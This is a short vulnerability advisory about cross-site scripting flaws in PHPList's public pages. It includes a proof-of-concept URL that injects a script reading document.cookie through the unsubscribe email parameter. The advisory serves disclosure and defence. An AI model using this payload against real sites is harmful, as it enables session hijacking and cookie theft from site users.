• info
• discussion
• exploit
• solution
• references

PHPList Public Pages MultipleCross-Site Scripting Vulnerabilities

These issues can be exploited through a web client.

The following proof of concept is available:

http://www.example.com/phplist_path/?p=unsubscribe&id=1&unsubscribeemail=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E